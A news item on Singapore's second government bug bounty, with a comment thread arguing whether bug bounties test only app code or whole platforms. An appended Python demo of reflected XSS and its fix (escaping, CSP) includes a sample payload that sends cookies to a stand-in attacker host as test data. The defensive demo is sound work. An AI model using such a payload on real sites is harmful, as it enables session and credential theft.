Hackers get invite to find holes in Singapore Govt's digital systems in 2nd bug bounty exercise
Five highly used Internet-facing systems and websites such as the REACH and MFA sites will be subject to ethical hackers' scrutiny for a month.
Good initiative. But why only 5 systems? Wouldn't it be better to include all .gov.sg sites and patch more vulnerable entry points?
When these 5 systems are put out to be hacked, they are doing so in a controlled environment.
Any vulnerabilities found are then documented, and patches can then be rolled out to all other Government systems that use a similar platform.
It will take time to develop the patches and then patch the systems using a similar platform.
By doing so, it will not disrupt the live systems that serve the public or the internal systems that serve the Administration.
If all systems are rolled out for hacking:
(1) Hackers cannot stay focused on a few systems to find vulnerabilities, as there are thousands of systems out there, and may miss the vulnerabilities in the few target systems.
(2) Too many systems may be disrupted if all systems are put out for hacking.
E.g. these few systems may use the Microsoft .NET platform for web development, subject to controlled hacking.
After the hacking event, vulnerabilities found can be shared with all Government departments using the same Microsoft platform for development, who develop patches and patch up their systems.
Next time another web platform will be chosen, and the same process repeated.
Imagine if all web platforms are rolled out for hacking: how do hackers stay focused, and how to control the damage when there are so many platforms out there to control?
Thus by rolling out these 5 systems on the Microsoft platform, hackers with Microsoft knowledge can be invited.
Breeke Lo - Microsoft platform means apps developed using this platform. Apps developed using .NET and J2EE should be different, right?
And it is not true that OS companies will patch up everything, as there are many features out there, and they rely on OS and platform administrators to harden and tighten them.
Thus apps development done on the Microsoft platform will need to harden the apps, as well as the OS and its platform.
Now only the REACH dept and MFA IT dept need to be on standby.
If open to all, all gov dept IT need to be on standby.
Security is not only on apps.
It covers all the 7 layers of OSI. E.g. the SingHealth Citrix platform: a few OSI layers were compromised.
Interesting, my other comprehensive responses were deleted multiple times.
Looks like I can't reveal too much.
Ok that's all.
Breeke Lo
Ricky Lim honestly, you don't know what you are talking about. You don't test OSes or frameworks. Whether our apps were written in ASP, PHP, Python, JavaScript or whatever .. you are testing the code we wrote. Every single app needs to be tested on its own. You can't 'port' over your patches.
That's all.
Breeke Lo - e.g. the SingHealth app is not only an app.
It is the whole platform: the apps reside in the Citrix platform, and a few OSI-layer vulnerabilities were exploited before getting into the SCM.
Now patches on vulnerabilities in the Citrix platform can be ported over to other Citrix platforms.
I quote the e.g. of the Microsoft platform, which includes MS Azure cloud, MS .NET, MS SQL etc., and apps (that can use any programming language) reside in it.
Govt IT is not only centralised; they also have individual Ministries' data centres and IT personnel.
Breeke Lo - It says system; a system covers all 7 OSI layers, not only apps (Web-Apps-Database) plus the entire platform/architecture.
(This is a summarised response; the 3rd comprehensive response was again deleted - strange.)
Breeke Lo
Ricky Lim bug bounty programs, like the perpetual programs at FB, Amazon etc. .. test WEB apps written in web languages. Other levels of security tests cannot be carried out remotely from overseas. System in this context means the open web systems, not your closed security ecosystems. Get it bo? You obviously have no clue what you are talking about and you still keep blabbering on.. stick to your areas of expertise ok? 😁
Ricky Lim a very easy way to help you get it .. what does the word BUG tell you? It's a loophole or poor coding left behind by the programmer who wrote YOUR custom apps/system.
Breeke Lo - have you bid for any tender or developed any "application system" for the Government?
You can find it in GeBIZ - all the specs for an "application system".
The whole system = whole architecture.
No need to argue with "what you know" based on web development; check GeBIZ for any "system" that the Government will tender out, or if not, check with any vendors that bid for any "application systems".
The "apps system" includes (Web-Apps-Database) plus the entire platform/architecture (including servers, database, OS, apps development, security devices, load balancers etc. as one package), known as the "particular apps system", not application programming called apps.
Check with those big apps vendors that bid for and won those apps tenders.
You will find out who is right, based on what you know and what actually is.
I will not comment anymore.
No Government tender for any application system or web portal goes without the entire "platform or architecture" as one package, because vendors need to be responsible for the:
(1) entire security related to this application system
(2) application load
(3) performance
(4) scalability
(5) transaction load
etc.
Vendors have to size up the servers, load balancers, security device capacity, network capacity, OS, memory capacity, disk space etc. based on the transaction load, web hits, caching requirements etc., and no government tenders will go without the entire platform or architecture for any application system projects or application/web development for the Government.
When the Government lets the hackers hack, they let them hack the whole platform, not just apps. The SingHealth hack is not an apps vulnerability; it is the entire Citrix platform that holds the SCM apps that was vulnerable.
Check with those apps vendors that win Government apps bids, then you tell me whether you are correct or I am correct.
Breeke Lo - because you don't know how the Government IT systems operate.
Breeke Lo
Ricky Lim there is A LOT to be done to secure and test ALL those moving components you listed in the tender docs.
HOWEVER, this bug bounty program is SPECIFICALLY addressing code vulnerabilities. That is what a BUG bounty program does.
It is NOT a COMPLETE security hardening exercise of the ENTIRE ecosystem.
GET IT?? My god.
Breeke Lo - You have not undergone such a test, i.e. why you literally pick up from this news, and you are fixated on the apps programming and only apps.
All those who are involved in such an exercise know the scope and the scale.
Find out from people who are involved before you push your ideas.
Any hacker worth their salt doesn't start by hacking the apps first.
They will always start with all the low-level network info and the OS..... sigh ....
E.g. if you don't do DNS trace, traceroute, web discovery etc., how to hack apps?????? Faint....
If not, you volunteer yourself as the white hacker and let us know the scope, then no need to argue here.
Breeke Lo
Ricky Lim there are A LOT of other things to be done, OUTSIDE of this bug bounty program, to secure and test ALL those moving components you listed in the tender docs.
HOWEVER, this bug bounty program is SPECIFICALLY addressing code vulnerabilities. That is what a BUG bounty program does.
It is NOT a COMPLETE security hardening exercise of the ENTIRE ecosystem.
GET IT?? My god.
Ricky Lim
Breeke Lo - You have not undergone such a test, i.e. why you literally pick up from this news, and you are fixated on the apps programming and only apps.
All those who are involved in such an exercise know the scope and the scale.
Find out from people who are involved before you push your ideas.
Any hacker worth their salt doesn't start by hacking the apps first.
They will always start with all the low-level network info and the OS..... sigh .... (when you search a website and click on the link, we are already doing a DNS service: URL to IP translation).
The DNS server already needs to be involved in the 1st URL link click. And then the server load balancer will direct the URL hit to the available server that holds the web service. (You mean apps can operate in thin air meh?)
At least you will need access to the web server that holds the web pages.
You think hackers don't hack the DNS service and the load balancers first, and can just go straight to the web page meh? Doesn't make sense.
E.g. if you don't do DNS trace, traceroute, web discovery etc., how to hack web services?????? Faint....
If not, you see how the State APT hacked the SingHealth database: they don't start with apps first. Hackers will hack the platform, servers, OS, database, routers etc. that they can hold to go straight to the data, bypassing apps.
If not, you volunteer yourself as the white hacker and let us know the scope, then no need to argue here.
Breeke Lo
Ricky Lim Let me remind you what we are arguing over.
You said "patches can then be rolled out to all other Government systems that uses similar PLATFORMS"
I disagreed. I said, YOU CAN'T patch platforms. You can ONLY patch your OWN code.
So, once and for all, without any more copy and paste, thank you ..
1) Can we patch PLATFORMS / ARCHITECTURES (e.g. .NET, MS Server, Nginx)? Yes/No
2) We can only patch the bugs found in OUR own apps. Agree / Disagree
Ricky Lim
Breeke Lo - Have you heard of:
(1) Hardening of platform, routers, OS, servers?
(2) Virtual patching?
(3) Sandbox
(4) System patching
etc. All these are done by IT people, not platform vendors.
SingHealth "patching" and plugging of security loopholes: about 16 to 18 suggestions are related to the above. I have not heard of patching bugs in the SingHealth apps in the COI security recommendations, which will already have been ironed out.
The SingHealth State APT hacks are predominantly vulnerabilities in the platform and architecture, not the apps' bugs.
Silly for the Government not to let hackers hack the whole thing, and just hack apps.
REACH apps have been there for decades; any apps bugs will have been known long ago.
Breeke Lo
Ricky Lim Just curious, when you go into a car workshop to patch a hole in the tyre .. were you expecting the guy to test every moving part in your car? lol You know that you are only paying for the holes he patched, right?
Ricky Lim
Breeke Lo - I rest my case.
Let the truth be out one day. No point arguing.
Just to let you know that when Mindef let their web apps be hacked, it was everything.
The Mindef hack of web sites included network and systems:
The new initiative will allow Mindef to tap crowdsourcing to detect vulnerabilities, on top of the work done by its existing teams, said Mr Koh. “No individual organisation, not even the Government, has enough resources to check our own networks and systems, and fix all the vulnerabilities, all the time,” he added.
Now, this 30-year-old cybersecurity manager from Ernst & Young has been rewarded for being the top overall white hat participant in MINDEF's bug bounty programme.
The hacker, who wanted to be known only by his codename Darrel Shivadagger, reported nine out of 35 vulnerabilities that existed in MINDEF systems, one of which was rated a "high severity" bug. He was awarded US$5,000 (S$6,606) for his efforts.
"They (MINDEF) have systems in place that are actually quite sensitive,” Darrel said. “They actually warded off very intrusive attempts from me. I was able to find only client-side vulnerabilities. I couldn't really find anything major or server-side related.”
Darrel was one of 264 white hat hackers from around the world who participated in the programme, including people from the United States, Singapore, India, Romania, Canada, Russia, Sweden, Ireland, Egypt and Pakistan.
They were invited to try to penetrate systems - including the MINDEF’s public website, NS Portal and Defence Mail - for three weeks from Jan 15 until Feb 4.
In total, MINDEF rewarded US$14,750 in bounties to the 17 successful hackers who participated.
Read more at https://www.channelnewsasia.com/news/singapore/hacker-awarded-us-5-000-after-finding-9-vulnerabilities-in-9978058
I rest my case - argue for what?
Breeke Lo
Ricky Lim "Just let you know that when Mindef let their web apps hack - it is everything"
I AGREE! I don't know who you are arguing with on this? How to rob a room without going through the living room? lol
Which means the hacker will use the FASTEST and EASIEST route to reach the room. Thus your kitchen, your balcony are NOT tested. Get it?
Ricky Lim
Breeke Lo - see my post on the Mindef hack that hacked everything, deleted.
You can go to the Mindef website to check. So now the truth is out.
See the argument in an "endless loop"; only the "truth will dispel the endless loop".
Breeke Lo
Go to the HackerOne website and see their scope on the bounty program .. your answer is there
By the way, the first bounty program last year found 30+ vulnerabilities and the total we paid out was US$14,750. For this amount you are expecting complete security testing and hardening of all your 7 OSI levels? 3 words for you buddy - WAIT LONG LONG
用李
Sad...going digital.
Paul Tan
There is not much to gain from attacking web sites like the Gov.sg website and REACH. Mostly publicly available information. The last attack by cross-site scripting only managed to cause a little damage to reputation. Just make sure that the application can prevent the same XSS attack.
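The reflected cross-site scripting the comment above refers to, shown as an added example that is not part of the article or of any commenter's post: a handler that echoes a query parameter raw into HTML next to a hardened version that applies HTML output encoding and sets a Content-Security-Policy, with a small regression check of the kind a bounty retest would run. The handler shape (query string in, HTML body and headers out), the parameter name and the sample payload are all assumptions made for illustration.

```python
# Reflected XSS: a vulnerable echo handler beside a hardened one, with a
# regression check of the kind a bounty retest would run.
# Added example, not code from the article or from any commenter. The handler
# shape (query string in, HTML body and headers out) is an assumption standing
# in for whatever framework a real site uses.
from html import escape
from typing import Dict, Tuple
from urllib.parse import parse_qs

# Constructed sample inputs (not real traffic): a benign request and a
# classic reflected-XSS payload that exfiltrates document.cookie.
BENIGN_QUERY = "name=Alice"
XSS_QUERY = ("name=<script>new Image().src="
             "'http://attacker.invalid/?c='%2Bdocument.cookie</script>")

# Restrictive policy: no inline script, no remote script, no plugins.
CSP = ("default-src 'self'; script-src 'self'; object-src 'none'; "
       "base-uri 'none'; frame-ancestors 'none'")


def _param(query: str, key: str) -> str:
    """Decode one query parameter (empty string if absent)."""
    return parse_qs(query).get(key, [""])[0]


def render_vulnerable(query: str) -> str:
    """The bug class in question: the parameter is echoed raw into HTML."""
    name = _param(query, "name")
    return f"<html><body><p>Hello {name}</p></body></html>"


def render_hardened(query: str) -> Tuple[str, Dict[str, str]]:
    """Contextual output encoding (HTML text context) plus a restrictive CSP
    and nosniff as defence in depth. escape() with quote=True also covers the
    attribute context, so the same helper is safe for value="..." slots."""
    name = _param(query, "name")
    body = f"<html><body><p>Hello {escape(name, quote=True)}</p></body></html>"
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
        "X-Content-Type-Options": "nosniff",
    }
    return body, headers


def reflects_unescaped(query: str, html: str) -> bool:
    """Regression check: does the decoded 'name' parameter land in the page
    verbatim while containing a '<'? A '<' that survives encoding means the
    attacker controls markup, so a True result is a failing test."""
    value = _param(query, "name")
    return "<" in value and value in html


if __name__ == "__main__":
    print("vulnerable reflects markup:",
          reflects_unescaped(XSS_QUERY, render_vulnerable(XSS_QUERY)))
    body, headers = render_hardened(XSS_QUERY)
    print("hardened reflects markup:  ", reflects_unescaped(XSS_QUERY, body))
    print(body)
    print(headers["Content-Security-Policy"])
```

The encoding step is what actually closes the bug; the CSP header limits what an injection can do if some other template is missed, and is worth checking on the retest as well, since a fix that only adds a header leaves the reflected markup in place.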